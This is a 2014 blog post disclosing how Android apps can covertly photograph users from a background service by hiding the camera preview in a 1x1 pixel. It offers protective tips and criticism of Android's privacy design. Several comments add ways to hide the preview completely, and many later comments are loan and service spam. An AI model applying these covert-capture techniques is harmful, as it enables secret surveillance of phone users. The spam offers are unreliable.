Thursday, May 22, 2014

Exploring limits of covert data collection on Android: apps can take photos with your phone without you knowing.

SHORT VERSION: Android apps can take photos with your phone in background phones without displaying any notification and you won't see the app on the list of installed applications. App can send the photos over the internet to their private server. You can also find video with demo in this post.

Introduction (camera)

I discovered this almost by accident while doing a team project for a Computer and Network Security course at my university. The project suggested by college of mine (Predrag Gruevski) was mostly about using cameras on PC's without turning on indicator light. There were already promising findings in this field (iSeeYou paper discussed doing so on old Mac models). Since the project was relatively general each of member of our team took different approach. I initially started with low-level USB hacking, but despite genuine efforts I found nothing really interesting. Further experiments seemed really boring to me, because they in general involved trying various different cameras and hours of starting at LED light hoping the camera light won't blink.


I switched my focus to Android. Initial research was promising. There are many apps on Play Store (if you are iPhone user think App Store) that aim at taking pictures without any visual indication (ACLU-NJ Police TapeMobile Hidden Camera and more) but from what I found all of them require app activity to be visible and phone screen to be on. Some of them manage to record video without visible preview. 

Technical Details

What I wanted is to take pictures without user knowing, but at any time, not only when the app is on. I started googling and first thing that I found is that using Camera technically requires a preview to be displayed on screen in order to take video, but background services do not have associated visible activity. But let's not get discouraged an keep trying. I wrote a small camera app for my Nexus 5. My first approach was to create a View object that is not attached to any activity and feed preview to that object. That fails (I literally get "take picture failed" exception). The I remembered something that later turned out to be very relevant. Facebook messages draws to the UI, even when the app is not technically running:

This turned out to be indeed the right track. I attached preview to the screen from the background service and indeed I was able to take a photo! This is not yet ideal - the preview is visible on the screen user can clearly see that something is going on. But then I tried to remove it. Here's a list of approaches:

  • Make preview invisible - failed: Android just ignores this setting for preview
  • Make preview transparent - failed: Android just ignores this settings for preview
  • Cover preview by another view - partially failed: the view on top is still obstructing the screen
  • Make preview 1x1 pixel - successful
The result was amazing and scary at the same time - the pixel is virtually impossible to spot on Nexus 5 screen (even when you know where to look)! Also it turned out that even if you turn the screen completely off, you can still take photos, as long as the pixel is still there. 


If you cannot see this video here's a direct link:

How can you protect yourself form malicious apps?

If you are as disturbed by this find as I am you will start asking what can we do to avoid such situations. The bad news is that it's kind of a cat and mouse game - no matter how hard you try attackers can find more ways to obfuscate malicious activity. The good news is there are some ways that seem (at least given my current knowledge hard to circumvent:

  1. Pay attention to permissions (for example does Simple Notepad* really need access to your camera?)
  2. Keep your Google Account secure - if somebody can access your Google account they can install apps on your phone remotely without you approving it! Set up two step verification. Change your password from time to time. Set up secure password
  3. Uninstall unused apps. 

    battery                    internet
  4. High battery consumption (settings -> battery), and high bandwidth (settings -> data usage) are potential culprits

  5. Look at the background services that are running (settings -> apps -> running) - does Simple Notepad* really require background service
  6. Swiping app out of application list does not switch off background services (if you want to completely switch it off go to App Info (long press app icon inside menu and drag it to app info section) and click force stop - this ensures no background services are running. As @LB points out "force stop" effect is not permanent (technical: The service can be started again by registering and receiving an intent). 
*Simple Notepad is a made up example - I am not referring to any app in particular.

(hopefully constructive) criticism of Android design decisions

Let me start by the fact that I really like Android SDK (maybe except the fact that it's Java - but I understand the logic behind that decision). It's nice because it gives a developer a lot of power. There are just some things that are possible on Android that simply would not be possible on other platforms.

However given the fact that privacy is recently more and more of a growing concern, it would be nice to adjust accordingly. In my opinion privacy can be achieved by transparency without sacrificing comport. I could imagine use cases where I want app to take photos from background service. But I think it's inexcusable that user is not notified about this face. Android has a very nice notification bar. Users are very used to it. Why not make a use of it here. Same goes for sounds recording location recording etc.

Another thing I think Android team should look into is modern security research. There's lot of ways of using data without direct access. Very simple example would be that can send emails to users without learning their email address - with Google acting as a intermediary.

All of those suggestions can be summarized in on sentence - please put more effort into ensuring users' privacy. 


  1. Great research Szymon! Willing to look deeper into the code and/or implementations, cheers from México!

    1. I am still unsure if I should publish the code...

    2. I wouldn't do that. It's creepy enough to know that it works.

    3. For me, this is not a bug. It's a feature. There are many tutorials on how to get camera pictures without displaying the preview, por example: (For more examples or different ways of doing it, just Google: android take picture without preview)

  2. Yep. Hold the code close. No need to feed the CopyKidlets. I'm sure there will be similar exploit code out there but hopefully the holders of such code will be much smaller.

  3. Hi Szymon, Thanks for sharing this Issue! actually I've just developed an app from 1 month ago can do the same functionality. It's a big security Issue, Do you think we can contact Google ?
    Happy to be in contact with you by anyway.


    1. This comment has been removed by the author.

    2. I can send you an apk to insure that ?

    3. This comment has been removed by the author.

    4. Hey! I actually already emailed

      btw. I also understand that there are more people that were aware of this (I am not surprised actually - it's not that hard to find) - sorry for taking all the credit for this. If you want, email me and I can link to your project in my post.

    5. Thanks so much for your words Szymon ! Actually I emailed after I post my comment here. I was wanted to help you to save user's privacy. my project is under construction not published yet. by anyway I will be happy to be in contact with your honor.

  4. Cerberus does exactly this and I want it to do that since this is an app that can allow me to track my phone if it gets stolen. So while I understand this is a problem if an app like this gets on your phone without your knowledge, it's necessary for other apps. If Android were to perform this action natively through Android Device Manager, I would be more open to removing this capability. But not until then.

  5. You can redirect the preview to an OpenGL texture (texture surface). This is very handy if you want to display effects instantly during the preview. However, this seems to be more handy to achieve what you want: just don't display the texture at all.

  6. You may find that Office Anti-Spy can stop anyone from taking control both of an Android phone's cameras, microphones and recording capability. Check out

  7. Congratulations on rediscovering the most widely used method for utilizing CV in android! :p

    The standard Android Camera API is quite bad, so we remove the standard preview and process the raw camera data ourselves to bypass it, works far better.

    It is of no security concern as long as you actually read the permissions for a app before you install it.


    And here is a app i did a year ago using this:


  8. Some things about your technique :
    1. since there is no notification, your service runs on the background, so it can easily be closed when there aren't a lot of system resources (try playing a game, for example).
    2. I think that you can even avoid having the pixel from being shown, by setting the margin value of the layoutParams of the window of it to be outside of the screen.
    I assume you did the on-top camera preview by using another permission called "SYSTEM_ALERT_WINDOW" which allows to draw on top of all windows.
    3. This is not quite a security bug. It's something the user knows he has confirmed when he installed the app.
    In fact, this is a feature some security apps have (like taking a photo of the thief when he opens the device).
    The user isn't aware of many things the apps do in the background.
    4. force-stop only stops an app temporarily. it can wake itself using outside intents (like calls).
    you need to either disable it or uninstall it.

    1. Hi LB,

      Those are all good remarks. In particular nr 4 is important remark that I think people should be aware of - I incorporated it into post body.


  9. Did you do that on purpose?

    "Simple Notepad" is the fake app name used by "Mobile Hidden Camera ", an app designed to let people use their phones to take photos and videos in public surreptitiously. Been on play Store for quite a while.

    If it wasn't on purpose it's a heck of a coinkydink.

  10. Awesome job man, ive talked about your job on my web. Cheers!

  11. hehehe u look like ERLICH BACHMANN “El Peludo”/”The J-2000: Steve Jobs 2.0” nice work with that code i hope u can give a copy just to learn a bit more

  12. Great job men it was amazing...

  13. Having made a torch app (torch activation requires camera on), I can confirm that you can hide the view completely by adding a negative margin to the SurfaceView

  14. Hi Szymon,
    so if the more technologycal are getting the phons ( and tablets) the more concerned you should be about security failures. Because there always will be a way to cheat on the rules without breaking them ( like the 1x1 pixel preview ).
    It would be great if , nowadays, turning off our phones really mean any app will continue running.
    Great job.

  15. This comment has been removed by a blog administrator.

  16. Its really awesome effort and research. I liked your thread. Keep sharing your all new posts. Its really awesome. Android Development

  17. This comment has been removed by a blog administrator.

  18. This comment has been removed by a blog administrator.

  19. can teach me?i wanna ply my friend hahahah

  20. I read all you gurus' comments but I have a very simple something over your phone when it is lying down!!!!!!!


  21. No credit weighing is being followed in this while getting the stores. The Applicants like inhabitants and non-property proprietors with no dithering can undoubtedly request it as in this the candidate doesn't oblige presenting any guarantee against the cash with the bank as it is an unsecured credit.

  22. And also the whole difficulties tend to be trapped in the doorway as healthcare or even incident expenses, electrical power expenses, party costs, car fix, wellness costs, oil costs or even important moves drinking water provide expenses, kid's college or even training charge as well as away hands unique journey.


  23. This means which Tenants and non-property cases may also get associated with crisis cash loans.
    bad credit payday loans @

  24. You can install an app like "Cameraless" and you are safe!

  25. Great information. Thanks for providing us such a useful information. Keep up the good work and continue providing us more quality information from time to time. Android Development

  26. Hi Szymon,
    Can you contact me with my email,
    I have a deal to make with you.
    We can talk through email. I wait for your email.
    Hope to hear from you soon.
    See you.

  27. Back before cell phones, SLR cameras all had lens caps. Why don't manufacturers of Cell Phone cases make them with sliding lens caps?
    I made one for my last Samsung S4. It was cut (using a Dremel) from the stainless sliding door from an old 3.5" floppy. It had a fingernail pull and fit between the inner soft shell and outer hard shell of an Otterbox protector case.
    I had purchased three of those phones at the same time for my family. Only mine had the lens cap which I installed 3 days after getting the phones. Two days after putting the lens cap on, my phone got a pop-up message saying that if there were anything wrong with my phone or not working properly I should return it to my service provider while it was under warranty. My phone with the lens cap was the only one of the three to get that message. Someone was trying to use my camera remotely.

  28. This type of message always inspiring and I prefer to read content, so happy to find good place to many here in the post, the writing is just great, thanks for the post.
    selfie apps

  29. can you tell me?? if we using our normal camera capturing (images or video) that also transfer into server private network or not??

  30. Are you looking for a loan to pay off your bills and start up your own Business? We can assist you with any amount you need with just 3% interest rate provided you are going to pay back at when due. If interested do contact us via email today for more details.Email

  31. I am happy to find this post very useful for me, as it contains lot of information. I always prefer to read the quality content and this thing I found in you post. Thanks for sharing Unemployed Tenant Loans

  32. The pictures made my mouth water. Not fair. Now I'm craving number of Cakes that I've never tried before. . I crave sweet bread like you edit. :) Time for some Cakes for more details visit: birthday cake order online nagpur|Taubys

  33. Thanks for share with us because it's something that i've to learn as soon as possible, very useful

  34. Same Day Loans Lenders Only @
    Gone are the days when lenders help the salaried only to take financial assistance. But in today’s loan arena there are several different lenders who help different loan seekers. Even if your cash need is urgent to acquire then apply for same day loans lenders onlywithout thinking about your previous credit records. Reason behind of it is that there is no credit check done and also collateral isn’t required to pledge against the lender.
    Fund in between £100 to £1000 you can acquire under the provision of same day loans lenders only and this is repaid within the space of month. Taking the assistance of these loans you can utilize the loan in various small needs such as paying for medical bills, electricity bills, traveling expenses, grocery store bills, paying for home loan instalments, consolidating previous credit card bills and so many more.
    In case you are suffering from adverse credit factors which consist of defaults, arrears, late payments, missed payments, CCJs, IVA or insolvency then apply for same day loans bad credit without worrying about credit checks. On the other hand, there are specific criteria which you have to follow as you are citizen of Great Britain, you are employed with monthly income at least £1000 and you have an active checking account. Apart from these you have crossed over 18 years of age at the time of applying for these credits.

  35. 12 Month Loans for Bad Credit No Brokers@
    12 month loans for bad credit no brokers are considered as the key solution to solve emergency payments right in time. If you suddenly face some uninvited payments then apply for 12 month loans for bad credit no brokers and grab hold of money in ranging from £100 to £1000 for the flexible repayment period of 12 months. The amazing fact is that the rates of interest are also cost-effective and suited to your pocket money.
    Persons who are suffering from history of poor credit performances, or they are suffering from defaults, arrears, foreclosure, late payments, missed payments, CCJs, IVA or bankruptcy can also avail of these loans without going through the credit check procedure. But there are enlisted terms and conditions which you have to satisfy before applying for the loan.
    • Be adult and above 18 years of age
    • Be permanent resident of United Kingdom
    • Be permanent employee with stable income of at least £1000 per month
    • Be holding an active checking account with debit card
    Afterward you can straightforwardly choose the best direct lender online and apply for 12 month payday loans direct lenders through the medium of an application. You are to fill out the lender’s application form mentioning your authentic information and you will be free of faxing and lengthy paperwork. If application’s details are accurate then the lender will approve your loan and it is sanctioned direct into your bank account same day.


  37. The post has provided me relevant and useful details about Unemployed loans no guarantor option. After reading this post, I finally decided to approach the online lenders for availing these loans on convenient terms.

  38. hi szymon,

    could you help me with your project link, may be over git.
    I actually am researching on permission issues with android apps.
    Will be much help to be having able to replicate such an issue.

  39. عمليات التنظيف ونقل الاثاث ومكافحة الحشرات والعزل هي عمليات ضرورية جدًا ، وذلك للمحافظة على صحة أطفالنا ووقتنا من الضياع ولكن عملية التنظيف مرهقة للغاية وايضا النقل من مكان لاخر ، ويؤدي ذلك إلى الإهمال في الاهتمام بتلك العمليات مما يترتب عليها الكثير من التعب والأمراض ، لذلك نقدم لكم افضل خدماتنا كما نقدم العديد من الخدمات الاخري مثل
    شركة نقل عفش بالطائف
    شركة تنظيف بالطائف
    شركة تنظيف بالبخار بالطائف
    شركة مكافحة حشرات بالطائف
    شركة عزل اسطح بالطائف

  40. تميزت شركة نقل اثاث بالرياض بامتلاكها عدد كبير ومتنوع من سيارات النقل المجهزة، لجميع أنواع المنقولات المراد نقلها، سواء كنت منقولات كهربائية او نقل اثاث وتقوم شركة نقل اثاث بالرياض بنقل جميع أنواع الأثاث والقيام بعملية نقل اثاث بسهولة كبيرة، كما تقدم شركة نقل اثاث وعفش خدماتها في جميع انحاء المملكة العربية السعودية بنفس الكفاءة والاحتراف .

  41. Thanks for sharing this nice post awesome keep sharing
    Happy New Year 2018 Status

  42. Guaranteed loan offer

    Do you need a loan of any kind? We are the fastest lender creditors in the world. This is your opportunity to obtain a loan from our company at an interest rate of 3%. Our loans are guaranteed and guaranteed. Quick loans in a matter of minutes. Contact us today if you need to obtain a loan offer for free at this time, through our contact email address:
    Our services include the following:

    *Truck Loans
    * Personal Loans
    * Debt consolidation loans
    * Car Loans
    * Business Loans
    * Education Loans
    * Mortgage
    *Refinancing Loans
    * Home Loans

    We give you loan with a low interest rate of 2% and loan duration of 1 to 30 years to pay back the loan (secure and unsecured). Do not keep your financial problems to yourself in order for you not to be debt master or financial stress up, which is why you must contact us quickly for a solution to your financial problems. It will be a great joy to us when you are financially stable. Email address:
    Phone Number : +1 (512) 975-3897
    Susan Wanda

  43. الشركة تمتلك خبرة كبيرة ومعرفة تامة بكافة الحشرات التي تعيش بمدينة الرياض ونمتلك كافة المبيدات اللازمة للقضاء عليها ونحن بقسم شركة رش مبيدات بالرياض نهتم باقتناء احدث المبيدات المستعملة على الصعيد العالمي حيث نضمن باستيرادها افضل جودة لخدمتنا ونشكل جلسات عمل علي يد مختصين للتوعية واعطاء التعليمات الخاصة باستخدام المبيدات كل نوع منها على حدا لانها تمتاز بتنوع كبير وطرق استخدام مختلفة ونتائج ايضآ مختلفة.
    شركة رش مبيدات بالرياض
    شركة مكافحة حشرات بالرياض
    شركة مكافحة النمل الابيض بالرياض

  44. Guaranteed loan offer

    Do you need a loan of any kind? We are the fastest lender creditors in the world. This is your opportunity to obtain a loan from our company at an interest rate of 3%. Our loans are guaranteed and guaranteed. Quick loans in a matter of minutes. Contact us today if you need to obtain a loan offer for free at this time, through our contact email address:
    Anthony Noto

  45. I must say, as a lot as I enjoyed reading what you had to say, I couldnt help but lose interest after a while. Its as if you had a wonderful grasp on the subject matter, but you forgot to include your readers. Perhaps you should think about this from far more than one angle. Or maybe you shouldnt generalise so considerably. Its better if you think about what others may have to say instead of just going for a gut reaction to the subject. Think about adjusting your own believed process and giving others who may read this the benefit of the doubt.
    thanksgiving day


  46. Oh this site is really amazing I wish to visit again. I will post article on my facebook for this beautiful site
    happy new year